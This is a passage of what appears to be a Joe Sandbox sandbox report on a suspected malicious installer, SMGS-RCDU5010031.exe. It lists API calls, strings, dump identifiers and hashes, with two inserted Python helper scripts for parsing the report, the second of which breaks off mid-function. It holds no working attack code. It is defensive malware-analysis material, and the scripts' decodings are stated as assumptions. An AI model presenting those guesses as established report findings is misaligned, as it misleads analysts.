• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F$Snubbendes Setup
• API String ID: 941294808-2339128912
• Opcode ID: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
• Instruction ID: 99fcf956b6c6492db4cb7183bc7c026c58e5ce6762c1973727186ff321cad974
• Opcode Fuzzy Hash: 2f348b4d91443a475dcd35d85824ce7e5a946905d26cbae13f88812008241038
• Instruction Fuzzy Hash: 81418A71800209AFCF058F95DE459AFBBB9FF44315F04842EF991AA1A0C778EA54DFA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• lstrcpyW.KERNEL32(004308E8,NUL), ref: 00405D8E
• CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,00405F12,?,?), ref: 00405DB2
• GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405DBB
  • Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9A
  • Part of subcall function 00405B8A: lstrlenA.KERNEL32(00000000,?,00000000,00405E6B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BCC
• GetShortPathNameW.KERNEL32(004310E8,004310E8,00000400), ref: 00405DD8
• wsprintfA.USER32 ref: 00405DF6
• GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405E31
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E40
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
• SetFilePointer.KERNEL32(0040A558,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A558,00000000,[Rename],00000000,00000000,00000000), ref: 00405ECE
• GlobalFree.KERNEL32(00000000), ref: 00405EDF
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EE6
  • Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\SMGS-RCDU5010031.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00405C29
  • Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00405C4B
Strings
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                                                                                          • String ID: %ls=%ls$NUL$[Rename]
                                                                                                                                                                                                          • API String ID: 222337774-899692902
                                                                                                                                                                                                          • Opcode ID: 32b57ce3ca8940dfd53990341f9ef3c7080b2e07a05584e4532bbcc5854619bf
                                                                                                                                                                                                          • Instruction ID: 0ee0d7f4969d0e8ff8498481139b35b4394cb67f0e1a7fb2b2bdcfef73d002b4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32b57ce3ca8940dfd53990341f9ef3c7080b2e07a05584e4532bbcc5854619bf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59310230200B147BD2207B619D49F6B3A6CDF45759F14003BBA85F62D2DA7C9E018EEC
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75BA3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
                                                                                                                                                                                                          • CharNextW.USER32(?,?,?,00000000), ref: 00406356
                                                                                                                                                                                                          • CharNextW.USER32(?,00000000,75BA3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040635B
                                                                                                                                                                                                          • CharPrevW.USER32(?,?,75BA3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 0040636E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • "C:\Users\user\Desktop\SMGS-RCDU5010031.exe", xrefs: 004062E4
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004062E5
                                                                                                                                                                                                          • *?|<>/":, xrefs: 00406336
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\SMGS-RCDU5010031.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                          • API String ID: 589700163-1684567186
                                                                                                                                                                                                          • Opcode ID: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                                                                                                                                                                          • Instruction ID: 318300b0f17d4b51c4b24ffcfd5e9ca079934b39012f6efb3a6e40df4f12a45c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b766ee50bb8b1a0f4eab2cbe77ea87c6d078045d263edb3b82a780548374b37
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF11B22680071695DB303B149C40AB7A2B8EF58790B56903FED8AB32C1F77C5C9286FD
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 00404198
                                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 004041B4
                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 004041C0
                                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 004041CC
                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004041DF
                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 004041EF
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00404209
                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404213
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                                          • Opcode ID: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                                                                                                                                                          • Instruction ID: 1f16dc129e5574868776b4f98a2cc19ea4617ee8107c94e5cfbd03f7ded5ca1d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c443cadc41ebc586ff1270cf4c3a90a0d5c0685d314312a93ad56e7471fbb8ef
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F2181B1500704ABCB219F68DE08B5BBBF8AF41714B04896DF992F66A0D734E944CB64
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

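Reading these per-function API lists by hand is slow, so the following Python, added here as an example and not part of the Joe Sandbox report nor code from the analyzed sample, parses the "APIs" lines of the function blocks listed on this page into structured records, decodes the list-view message constants passed to SendMessageW and the GlobalAlloc flag, and collects the string arguments the sandbox resolved. The sample input is copied from the report's own API lines; the regular expression, the constant table and the triage flags (reading `[Rename]` next to `%ls=%ls` and `NUL` as a wininit.ini-style rename/delete-on-reboot section, and `*?|<>/":` as a filter for reserved file-name characters) are this example's assumptions and interpretation, not report output.

```python
"""Parse the per-function 'APIs' blocks of a Joe Sandbox disassembly report.

Added example for this page: not Joe Sandbox tooling and not code from the
analyzed sample. SAMPLE is copied from the report's own API lines; the regex,
the constant table and the triage flags are this example's assumptions.
"""
import re

# Constructed input: API lines copied from the function blocks on this page.
SAMPLE = r"""
• GetShortPathNameW.KERNEL32(004310E8,004310E8,00000400), ref: 00405DD8
• wsprintfA.USER32 ref: 00405DF6
• GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405E31
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E40
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E78
• SetFilePointer.KERNEL32(0040A558,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A558,00000000,[Rename],00000000,00000000,00000000), ref: 00405ECE
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EE6
• Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",00403536,?), ref: 00405C4B
• CharNextW.USER32(?,*?|<>/":,00000000,00000000,75BA3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",0040327B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00406347
• SetWindowTextW.USER32(0042C228,0042C228), ref: 0040521C
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
• SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
• SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
"""

# One report line: optional "Part of subcall function XXXXXXXX:", API.MODULE,
# an optional "(args)" and the "ref: XXXXXXXX" call-site address.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)

# Win32 constants (SDK values): LVM_FIRST = 0x1000, GPTR = GMEM_FIXED|GMEM_ZEROINIT.
LVM_FIRST = 0x1000
LISTVIEW_MESSAGES = {
    LVM_FIRST + 4: "LVM_GETITEMCOUNT",
    LVM_FIRST + 19: "LVM_ENSUREVISIBLE",
    LVM_FIRST + 77: "LVM_INSERTITEMW",
}
GPTR = 0x40
RESERVED_FILENAME_CHARS = set('<>:"/\\|?*')  # reserved in Win32 file names


def hexarg(token):
    """'0000104D' -> 0x104D, '-0000000A' -> -10; None for '?' and string literals."""
    m = re.fullmatch(r"(-?)([0-9A-F]{8})", token)
    if not m:
        return None
    value = int(m.group(2), 16)
    return -value if m.group(1) else value


def parse_api_lines(text):
    """Return one dict per matching API line; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line.strip())
        if not m:
            continue
        raw = m.group("args")
        calls.append({
            "api": m.group("api"), "module": m.group("mod"), "ref": m.group("ref"),
            "subcall": m.group("sub"),
            "args": [a.strip() for a in raw.split(",")] if raw else [],
        })
    return calls


def describe(call):
    """Short label for a call, decoding the constants this example knows about."""
    api, args = call["api"], call["args"]
    if api == "SendMessageW" and len(args) >= 2:
        msg = hexarg(args[1])
        name = LISTVIEW_MESSAGES.get(msg, f"0x{msg:04X}" if msg is not None else "?")
        return f"SendMessageW(msg={name})"
    if api == "GlobalAlloc" and args and hexarg(args[0]) == GPTR:
        return "GlobalAlloc(GPTR, ...)"
    return api


def literal_args(calls):
    """Argument tokens that are neither hex numbers nor '?': strings Joe resolved."""
    out = []
    for c in calls:
        for a in c["args"]:
            if a != "?" and hexarg(a) is None and a not in out:
                out.append(a)
    return out


def triage(calls):
    """Heuristic flags (this example's interpretation, not report output)."""
    lits = literal_args(calls)
    return {
        # '[Rename]' with '%ls=%ls' / 'NUL' is the wininit.ini rename-on-reboot layout
        "ini_rename_section": "[Rename]" in lits,
        # a literal made only of reserved file-name characters: a sanitizer's charset
        "filename_char_filter": any(len(a) > 3 and set(a) <= RESERVED_FILENAME_CHARS for a in lits),
        "listview_insert": any(describe(c) == "SendMessageW(msg=LVM_INSERTITEMW)" for c in calls),
        "strings": lits,
    }


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for c in parsed:
        print(c["ref"], describe(c))
    print(triage(parsed))
```

Run stand-alone it prints one decoded line per call followed by the flags; pointing `parse_api_lines` at a whole copied function block works too, since header lines such as "Strings" or "Memory Dump Source" do not match the pattern and are skipped.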
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenW.KERNEL32(0042C228,00000000,0041C400,75BA23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                                                                                                                          • lstrlenW.KERNEL32(0040318B,0042C228,00000000,0041C400,75BA23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                                                                                                                          • lstrcatW.KERNEL32(0042C228,0040318B), ref: 0040520A
                                                                                                                                                                                                          • SetWindowTextW.USER32(0042C228,0042C228), ref: 0040521C
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                                                                                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                                                                                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2531174081-0
                                                                                                                                                                                                          • Opcode ID: e3fc960ff43bac39058fc79546c11771123aad835ff3a9f0579e84c03a5b243d
                                                                                                                                                                                                          • Instruction ID: 3abc69651b1b947d68a29ef5f67bb3ab151c750651a003a3f474b57aa403b91e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e3fc960ff43bac39058fc79546c11771123aad835ff3a9f0579e84c03a5b243d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6216D71900518BACB119FA5DD85ECFBFB8EF45354F14807AF944B62A0C7798A50CF68
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A94
• GetMessagePos.USER32 ref: 00404A9C
• ScreenToClient.USER32(?,?), ref: 00404AB6
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AC8
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AEE
Strings
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
• Instruction ID: f7db0f90848f06194adfa2b80852422f0d01f782293f8b66888e1da33f3275eb
• Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
• Instruction Fuzzy Hash: 28015271E4021CBADB00DB94DD85FFEBBBCAF59711F10012BBA51B61C0C7B495018BA4
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetTimer.USER32(?,?,000000FA,00000000), ref: 00402D22
• MulDiv.KERNEL32(002984EB,00000064,0029A768), ref: 00402D4D
• wsprintfW.USER32 ref: 00402D5D
• SetWindowTextW.USER32(?,?), ref: 00402D6D
• SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
Strings
• verifying installer: %d%%, xrefs: 00402D57
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
• Opcode ID: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
• Instruction ID: e3b7989a6944ee3f74a5da6e22ee0ffb045f4e525cc1af55651639455de3416a
• Opcode Fuzzy Hash: 9823b761f001492aa494ef634f2695fad7e965f30442b605b2107c3f38143bb8
• Instruction Fuzzy Hash: F9014F7064020DBBEF249F61DE49FEA3B69FB04304F008439FA02A91E0DBB889559B58
Uniqueness
Uniqueness Score: -1.00%

APIs
• GlobalFree.KERNEL32(00000000), ref: 10002416
  • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
• GlobalAlloc.KERNEL32(00000040), ref: 10002397
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
Memory Dump Source
• Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.12055888328.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.12055950186.0000000010003000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.12055980900.0000000010005000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
• String ID:
• API String ID: 4216380887-0
• Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
• Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
• Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
• Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
Uniqueness
Uniqueness Score: -1.00%
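
The "Memory Dump Source" entries above repeat, for every function, the same set of dump identifiers for the image at 00400000 (the installer stub whose strings include "verifying installer: %d%%") and for the image at 10000000. When triaging a report like this it helps to pull those identifiers out once, decode them and list which regions were executable. The script below is an added example, not part of the Joe Sandbox report or its tooling. It assumes, from the shape of the names alone, that the fourth dotted field is the region base address and the fifth a Win32 PAGE_* protection value (0x20, 0x02 and 0x04 line up with an executable .text region at 00401000, read-only headers at 00400000 and a read/write region at 0040A000); the remaining fields are carried through undecoded. The sample text is a constructed excerpt of the listing above, with the "Download File" link text left glued on as it is in the report.

```python
"""Decode Joe Sandbox *.sdmp memory-dump identifiers and group them by image.

Added example, not Joe Sandbox code.  Field meanings are assumptions inferred
from the identifiers in the report: field 4 = region base, field 5 = PAGE_*
protection.  Other fields are kept but not interpreted.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Win32 memory protection constants (winnt.h); only the low byte is consulted.
PAGE_PROTECTIONS = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# e.g. 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp
SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.(?P<phase>[0-9A-F]{8})\.(?P<dump>[0-9]+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<prot>[0-9A-F]{8})\."
    r"(?P<rest>[0-9A-F]{8}(?:\.[0-9A-F]{8})*)\.sdmp",
    re.IGNORECASE,
)
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-F]{8})", re.IGNORECASE)


@dataclass(frozen=True, order=True)
class DumpRegion:
    base: int        # assumed: region start address (field 4)
    protect: int     # assumed: PAGE_* protection (field 5)
    process: int     # field 1, process index within the analysis
    phase: int       # field 2
    dump_id: int     # field 3
    rest: tuple      # trailing fields, not decoded

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECTIONS.get(self.protect & 0xFF, f"0x{self.protect:08X}")

    @property
    def executable(self) -> bool:
        # All PAGE_EXECUTE* values occupy the high nibble of the low byte.
        return bool(self.protect & 0xF0)


def parse_sdmp_name(name: str) -> DumpRegion:
    m = SDMP_RE.search(name)
    if m is None:
        raise ValueError(f"not a Joe Sandbox dump identifier: {name!r}")
    return DumpRegion(
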